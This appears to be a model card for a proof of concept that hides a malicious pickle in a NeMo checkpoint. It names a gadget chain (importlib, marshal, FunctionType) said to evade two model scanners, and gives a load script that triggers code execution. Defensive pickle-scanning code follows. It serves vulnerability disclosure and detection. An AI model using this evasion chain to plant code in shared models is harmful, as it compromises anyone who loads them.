Hugging Face model card: etwithin/nemo-scanner-bypass-poc
NeMo (.nemo) Scanner Bypass PoC
Vulnerability
Malicious pickle hidden inside NeMo tar archive's PyTorch checkpoint.
Scanner Bypass
- modelscan 0.8.8: No .nemo scanner → 0 issues
- picklescan 1.0.4: Scans nested .ckpt but chain bypasses detection → 0 infected
ACE
NeMo files are tar archives containing model_weights.ckpt (PyTorch checkpoint with pickle). Extracting and loading the checkpoint via torch.load(weights_only=False) triggers ACE.
Payload: importlib.import_module → marshal.loads → types.FunctionType → ACE
Reproduction

```python
import tarfile, torch

# Pull the PyTorch checkpoint out of the .nemo tar archive.
with tarfile.open("malicious_model.nemo", "r") as tar:
    ckpt = tar.extractfile("model_weights.ckpt").read()
with open("/tmp/ckpt.bin", "wb") as f:
    f.write(ckpt)

# weights_only=False unpickles arbitrary objects: this is the ACE trigger.
torch.load("/tmp/ckpt.bin", weights_only=False)  # ACE
```
Environment: PyTorch 2.10.0, modelscan 0.8.8, picklescan 1.0.4
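As an added example (not code from this card or the PoC repository), a defender-side check for the gap described above: it opens the .nemo tar in memory, finds the nested zip-format .ckpt, and disassembles its data.pkl with pickletools to list every global the pickle references, without ever calling torch.load or writing to disk. The allowlist of module prefixes, the archive layout and the sample inputs are assumptions constructed for this example; the sample pickles only reference a function by name (no REDUCE), so they are inert.

```python
import collections, importlib, io, pickle, pickletools, tarfile, zipfile

# Assumed allowlist: module prefixes a plain PyTorch state_dict pickle references.
ALLOWED_PREFIXES = ("torch", "collections", "numpy", "_codecs")

def pickle_globals(data: bytes) -> list[tuple[str, str]]:
    """Every (module, name) named by GLOBAL/STACK_GLOBAL, found by opcode disassembly only."""
    found, strings = [], []  # strings: recent pushes that STACK_GLOBAL pops as module, name
    for op, arg, _ in pickletools.genops(data):
        if op.name == "GLOBAL":
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":  # operands fetched via memo are flagged, not guessed
            found.append(tuple(strings[-2:]) if len(strings) >= 2 else ("<unresolved>", "?"))
        elif op.name.endswith(("UNICODE", "STRING")):
            strings.append(arg)
    return found

def scan_nemo(nemo_bytes: bytes) -> dict[str, list[tuple[str, str]]]:
    """Scan each zip-format *.ckpt inside a .nemo tar in memory: no torch.load, nothing on disk."""
    report = {}
    with tarfile.open(fileobj=io.BytesIO(nemo_bytes), mode="r") as tar:
        for info in tar.getmembers():
            if not (info.isfile() and info.name.endswith(".ckpt")):
                continue
            with zipfile.ZipFile(io.BytesIO(tar.extractfile(info).read())) as zf:
                for member in (m for m in zf.namelist() if m.endswith(".pkl")):
                    hits = [g for g in pickle_globals(zf.read(member))
                            if not g[0].startswith(ALLOWED_PREFIXES)]
                    if hits:
                        report[f"{info.name}:{member}"] = hits
    return report

def build_sample_nemo(data_pkl: bytes) -> bytes:
    """Constructed input: .nemo tar -> zip-format model_weights.ckpt -> archive/data.pkl."""
    zbuf, tbuf = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as zf:
        zf.writestr("archive/data.pkl", data_pkl)
    with tarfile.open(fileobj=tbuf, mode="w") as tar:
        info = tarfile.TarInfo("model_weights.ckpt")
        info.size = len(zbuf.getvalue())
        tar.addfile(info, io.BytesIO(zbuf.getvalue()))
    return tbuf.getvalue()

def demo() -> dict:
    # Pickling a function by reference emits only the global lookup (no REDUCE): inert sample.
    benign = build_sample_nemo(pickle.dumps(collections.OrderedDict(), protocol=4))
    flagged = build_sample_nemo(pickle.dumps(importlib.import_module, protocol=4))
    return {"benign": scan_nemo(benign), "flagged": scan_nemo(flagged)}
```

The benign archive produces an empty report, while the second one reports model_weights.ckpt:archive/data.pkl with the importlib reference, which is exactly the first link of the chain listed under Payload.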